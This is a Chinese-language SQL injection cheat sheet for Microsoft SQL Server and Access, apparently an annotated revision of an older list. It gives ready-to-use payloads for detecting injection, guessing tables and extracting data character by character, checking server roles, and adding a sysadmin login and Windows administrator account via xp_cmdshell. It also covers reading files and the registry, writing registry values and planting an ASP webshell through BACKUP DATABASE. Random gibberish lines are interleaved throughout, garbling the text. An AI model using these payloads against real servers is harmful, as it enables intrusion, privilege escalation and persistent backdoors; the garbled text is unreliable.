1.判断是否有注入（布尔检测）：;and 1=1 与 ;and 1=2 —— 两次请求的页面结果不同，说明参数被直接拼接进了 SQL 语句
2.初步判断是否是mssql：;and user>0 —— user 返回 nvarchar，与 int 比较时 MSSQL 会抛出类型转换错误并在错误信息中带出当前用户名；只有服务端回显详细错误时才能看到
Owpg]p yVD
3.注入参数是字符型：'and [查询条件] and ''='  （前后的单引号用于闭合原语句中的字符串）
N3yB1_
4.搜索框等未过滤参数（LIKE 查询）：'and [查询条件] and '%25'='  （%25 是 URL 编码后的 %，用于闭合 LIKE '%...%' 模式）
t-m9n*\j1
5.判断数据库系统（通过各系统特有的系统表是否存在来区分）
Wj j2J8B
;and (select count(*) from sysobjects)>0   成功则为 mssql（sysobjects 是 SQL Server 的系统表）
Q4m
z2Y_L8u2
;and (select count(*) from msysobjects)>0   成功则为 access（msysobjects 是 Access 的系统表；注意 Access 默认通常不允许读取该表，返回的多半是权限错误，但出现该错误本身也说明是 Access）
-V
u/TT0
(d'j'U:C
dHq )vs,L
6.猜表名（这里猜的是表而不是数据库，表不存在时查询报错）：;and (select Count(*) from [表名])>0
wvmg)4,
7.猜字段（字段不存在时查询报错）：;and (select Count(字段名) from 表名)>0
b;J0'o^G|
8.猜字段中记录长度：;and (select top 1 len(字段名) from 表名)>0  （逐步改变比较值做二分猜解）
RQpIBsj
9.(1)猜字段的ascii值(access)
QPe9s[Y
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0  （mid 取第 N 个字符，asc 取其码值；改变位置 1 和比较值逐位猜解）
{eswe
(2)猜字段的ascii值(mssql)
|pH*
CCA
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0  （与 Access 的 asc/mid 对应，mssql 用 unicode/substring）
=,d* {m~A
10.测试权限结构(mssql)：IS_SRVROLEMEMBER 返回 1 表示当前登录属于该服务器角色，0 表示不属于，NULL 表示角色名无效或无法判断
w38c
|J<pLz
~1=.?Ho
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
g|._n
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
C^,4`OI
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
6A$_&?
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
6L8tz8
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
5]H))}9>d
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
(K*/Vp
;and 1=(select IS_MEMBER('db_owner'));--  （IS_MEMBER 判断的是当前数据库中的数据库角色，而非服务器角色）
Gf
H*,1x
3|K=%jr[
-7k|6"EwM
11.添加mssql和系统的帐户（以下操作都需要 sysadmin 权限；xp_cmdshell 自 SQL Server 2005 起默认关闭，未启用时后面的 net user 命令不会执行）
Ig02M_
;exec master.dbo.sp_addlogin username;--  （sp_addlogin 已被标记为弃用但仍可用，新版本对应 CREATE LOGIN）
;exec master.dbo.sp_password null,password,username;--  （参数顺序为 旧密码,新密码,登录名；原文写成 null,username,password 会去修改名为 password 的登录，而不是给 username 设密码）
x&R9${e%
;exec master.dbo.sp_addsrvrolemember username,sysadmin;--  （参数顺序为 登录名,角色名，原文顺序写反且缺少逗号）
P /c
Q1
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--  （原文被断成两行且各开关之间缺少空格，这里合并为完整的一条命令）
`;5VH ]V
;exec master.dbo.xp_cmdshell 'net user username password /add';--
=
_K0izKTA.
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--  （xp_cmdshell 执行的命令以 SQL Server 服务账号身份运行，服务账号没有本机管理员权限时 net user/net localgroup 会失败）
V8sH{R-
GUu\dl9WA'
~?AC:
12.(1)遍历目录（把 xp_dirtree 的结果写入自建表，再借助类型转换错误逐条读出）
`26V`%bPkr
;create table dirs(paths varchar(100), id int)
S,*{q(
;insert dirs exec master.dbo.xp_dirtree 'c:\'  （xp_dirtree 返回 子目录名,深度 两列，与 dirs 的两列对应）
c<=`<!FS[
;and (select top 1 paths from dirs)>0  （varchar 与 int 比较触发转换错误，错误信息中带出路径）
sf |oNOz
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0  （原文末尾的 >) 是笔误，应为 >0；每得到一条路径就加入 not in 列表，直到没有报错为止）
vzY'+9q1.
JrCf,?L^
mL:m;>JJ n
(2)遍历目录（用一张 4 列的临时表承接各扩展存储过程的结果集）
c*x J=Gz6d
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器（返回 4 列，需与 temp 的列数一致）
7tpAZ<{
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表（只返回 1 列）
W)$f
3>-[B`dD(
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构（返回 子目录名,深度 两列）
Rk($lW)
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容（依赖 xp_cmdshell 已启用，输出每行占 temp 的一条记录）
O.@g/05C
,wtFs!8
M82.khm~jM
13.mssql中的存储过程（操作注册表的扩展存储过程；写入和删除类操作通常需要 sysadmin 权限）
L6|Hgrj -u
xp_regenumvalues 注册表根键, 子键
n+q_.A
81GQijq
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'  以多个记录集方式返回该子键下所有键值
dT5J-70Fl
xp_regread 根键,子键,键值名
b#D9eJhS
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'  返回指定键值的内容
o3Mf:;2c C
xp_regwrite 根键,子键, 值名, 值类型, 值
b8rp8'M)
常用的值类型有两种：REG_SZ 表示字符串，REG_DWORD 表示整型（注册表本身还有 REG_BINARY、REG_MULTI_SZ 等类型）
oN *SRaAp
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'  写入注册表
9@:BK;Fi
xp_regdeletevalue 根键,子键,值名
H@K#|A=a
;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'  删除某个值
=yl4zQmg$
;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'  删除键,包括该键下所有值
EkN_8(w
OENzG~
R=!kbBK>\
14.mssql的backup创建webshell（需要对 model 库的 BACKUP DATABASE 权限，且 SQL Server 服务账号要对目标目录有写权限；生成的文件除表中内容外还带有备份文件头等二进制数据）
L +L9Y}
use model
T"n{WmVQ
create table cmd(str image);
JZ `>|<W
insert into cmd(str) values ('');  （本文此处的值为空字符串，写入的内容就是备份文件中会出现的文本；注意 model 是新建数据库的模板，建在其中的 cmd 表会被之后新建的每个数据库继承）
^'m\D;
backup database model to disk='c:\l.asp';
^#]c0
xC<=~(
qs=Gj?GwGQ
15.mssql内置函数（下面均利用 字符串与 int 比较 触发的类型转换错误把结果回显到错误信息中）
+T9Q_e*
;and (select @@version)>0  获得 SQL Server 的版本信息（版本字符串中也包含操作系统版本，但它首先是数据库版本而不是 Windows 版本号）
? m&IF<b
;and user_name()='dbo'  判断当前连接用户在当前库中是否映射为 dbo（sa 和 sysadmin 成员会映射为 dbo，但数据库所有者同样是 dbo，因此 dbo 不等于 sa；要确认 sa/sysadmin 应使用第 10 节的 IS_SRVROLEMEMBER('sysadmin')）
he"L*p*H
;and (select user_name())>0  爆当前系统的连接用户（通过类型转换错误回显）
F "!agc2!
;and (select db_name())>0  得到当前连接的数据库
1Fv8T'
TYYp"wx
2b5 #PcKa
16.简洁的webshell（与第 14 节相同的 backup 写文件手法，仅输出路径不同，权限要求和文件头问题同样适用）
59.$ULQVMY
use model
}i(qt&U;
create table cmd(str image);
! 0^;;'
insert into cmd(str) values ('');
^V[/(Lq
backup database model to disk='g:\wwwtest\l.asp';